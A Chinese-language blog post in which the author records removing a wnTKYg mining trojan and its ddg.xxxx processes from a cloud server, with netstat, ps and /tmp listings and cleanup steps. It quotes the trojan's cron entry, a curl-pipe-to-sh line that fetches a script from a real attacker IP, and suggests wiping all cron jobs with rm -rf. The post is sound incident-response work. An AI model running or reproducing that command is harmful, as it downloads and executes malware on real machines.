記錄清除wnTKYg挖礦工木馬（守護進程ddg.xxxx）的過程

原由，阿里雲屢次提醒個人一臺服務器有惡意發包行爲，且給出了一些解決辦法。以前也沒太在乎，就按照解決辦法處理了一下。而後過一段時間，仍是提示有此行爲。

猜確定是中了木馬了，開始覺得是被肉雞了拿來作DDoS攻擊別人了。今天去服務器上仔細看了一下。而後發現了問題究竟（目前猜應該如此，還等待觀察）。

現將過程記錄以下：

 

一、先查看一下端口狀況，發現有些名爲ddg.xxxx的進程很可疑。而後看了下遠程的連接IP，美國、法國等地方，很奇怪。網上搜了一下，沒什麼結果。

[root@zhangtianguo ~]# netstat -anp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:22111           0.0.0.0:*               LISTEN      840/sshd            
tcp        0      0 127.0.0.1:32000         0.0.0.0:*               LISTEN      27121/java          
tcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTEN      20918/memcached     
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      813/nginx: worker p 
tcp        0      0 0.0.0.0:81              0.0.0.0:*               LISTEN      1497/httpd          
tcp        0      0 0.0.0.0:82              0.0.0.0:*               LISTEN      1497/httpd          
tcp        0      0 0.0.0.0:83              0.0.0.0:*               LISTEN      1497/httpd          
tcp        0      0 0.0.0.0:85              0.0.0.0:*               LISTEN      1497/httpd          
tcp      401      0 個人IP:42388    106.11.68.13:80         CLOSE_WAIT  11393/AliYunDunUpda 
tcp        0      1 個人IP:43968    52.2.199.2:8443         SYN_SENT    1620/ddg.1010       
tcp        0      1 個人IP:38258    54.222.159.38:8443      SYN_SENT    1620/ddg.1010       
tcp      401      0 個人IP:41811    106.11.68.13:80         CLOSE_WAIT  11393/AliYunDunUpda 
tcp      401      0 個人IP:53489    140.205.140.205:80      CLOSE_WAIT  11393/AliYunDunUpda 
tcp        0      0 個人IP:59795    202.181.169.98:8443     ESTABLISHED 25125/ddg.2011      
tcp        0      0 個人IP:50071    212.83.189.246:443      ESTABLISHED 12908/wnTKYg        
tcp        0      1 個人IP:47592    106.75.74.11:9443       SYN_SENT    12799/ddg.1009      
tcp      371      0 10.174.208.36:51087     100.100.25.3:80         CLOSE_WAIT  11393/AliYunDunUpda 
tcp        0      0 個人IP:40019    106.11.68.13:80         ESTABLISHED 11448/AliYunDun     
tcp        0      0 127.0.0.1:32000         127.0.0.1:31001         ESTABLISHED 27119/wrapper       
tcp        0      1 個人IP:39511    39.108.56.56:8443       SYN_SENT    1620/ddg.1010       
tcp        0      1 個人IP:50528    121.69.45.254:8443      SYN_SENT    1620/ddg.1010       
tcp        0      1 個人IP:51132    106.75.71.242:8443      SYN_SENT    1620/ddg.1010       
tcp        0      1 個人IP:60425    120.77.46.195:8443      SYN_SENT    1620/ddg.1010       
tcp        0      1 個人IP:54458    116.39.7.114:8443       SYN_SENT    1620/ddg.1010       
tcp        0      1 個人IP:57546    54.183.178.110:8443     SYN_SENT    1620/ddg.1010       
tcp        0      1 個人IP:57686    106.75.134.239:8443     SYN_SENT    1620/ddg.1010       
tcp        0      1 個人IP:56848    61.65.191.22:8443       SYN_SENT    1620/ddg.1010       
tcp      401      0 個人IP:52910    106.11.68.13:80         CLOSE_WAIT  11393/AliYunDunUpda 
tcp        0    604 個人IP:22111    27.10.185.19:63158      ESTABLISHED 19368/sshd: root@pt 
tcp        0      1 個人IP:56357    165.225.157.157:8443    SYN_SENT    1620/ddg.1010       

 

二、而後，看了下這個進程的具體狀況，竟然是在/tmp/下的進程，心中更多抑或：

[root@zhangtianguo ~]# ps aux | grep ddg
root      1620  0.1  0.7 209684 13688 ?        Sl   Jul12  78:05 /tmp/ddg.1010
root     12799  0.0  0.2 262816  5460 ?        Sl   Jul01   9:32 /tmp/ddg.1009
root     19576  0.0  0.0 112644   960 pts/1    S+   10:01   0:00 grep --color=auto ddg
root     25125  0.0  0.2 207236  5172 ?        Sl   Aug27   2:13 /tmp/ddg.2011
root     28248  0.0  0.2 207192  4520 ?        Sl   Jul27  38:09 /tmp/ddg.1021

 

三、再去看看/tmp/下的文件，只有一個ddg.2011的文件，當時就心想，確定是這些進程運行後，又自動刪除了文件，看時間，8月建立的時間的文件，所有通通rm掉：

[root@zhangtianguo tmp]# ll -ah
total 9.6M
drwxrwxrwt.  9 root root 4.0K Aug 29 10:02 .
drwxr-xr-x. 20 root root 4.0K Jun 30 18:04 ..
srwxr-xr-x   1 root root    0 Aug 28 12:53 Aegis-<Guid(5A2C30A2-A87D-490A-9281-6765EDAD7CBA)>
-rwxr-xr-x   1 root root 9.5M Aug 11 10:13 ddg.2011
drwxrwxrwt.  2 root root 4.0K Nov 21  2014 .font-unix
drwxr-xr-x   2 root root 4.0K Aug 17 10:07 hsperfdata_root
drwxrwxrwt.  2 root root 4.0K Nov 21  2014 .ICE-unix
drwx------   3 root root 4.0K Nov 26  2015 systemd-private-nwO9vi
drwxrwxrwt.  2 root root 4.0K Nov 21  2014 .Test-unix
drwxrwxrwt.  2 root root 4.0K Nov 21  2014 .X11-unix
drwxrwxrwt.  2 root root 4.0K Nov 21  2014 .XIM-unix

 

四、再重複步驟1，查看端口狀況，又發現了這個玩意兒，感受不太正常（直覺）：

tcp        0      0 個人IP:50071    212.83.189.246:443      ESTABLISHED 12908/wnTKYg   

 

五、一搜，原來竟然是個挖礦的程序貌似。原來已經有很多人中招過了。解決辦法也有不少人給出了，基本上就是：

先給redis的問題處理掉，改端口、加密碼之類；

查看/root/.ssh/下的文件，是否有異常登錄信息，有的話刪掉；

搜索wnTKYg的相關文件（ find / -name *wnTKYg*），刪掉；

刪掉/tmp/下的異常文件（主要是ddg.xxxx之類的）；

kill掉wnTKYg以及ddg.xxxx的進程；

還有個問題，這個程序有個自動任務，從木馬服務器下載程序執行，也要刪掉：

cd /var/spool/cron
ll -ah
rm -rf *

我查看這個目錄時，發現裏面的自動任務是這樣的，好像是印度一個IP：

[root@zhangtianguo cron]# cat root
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh?6 | sh

至此，完工。而後繼續觀察。

 

參考資料。感謝：

http://blog.csdn.net/u010789532/article/details/70528648

http://blog.csdn.net/zimou5581/article/details/73064878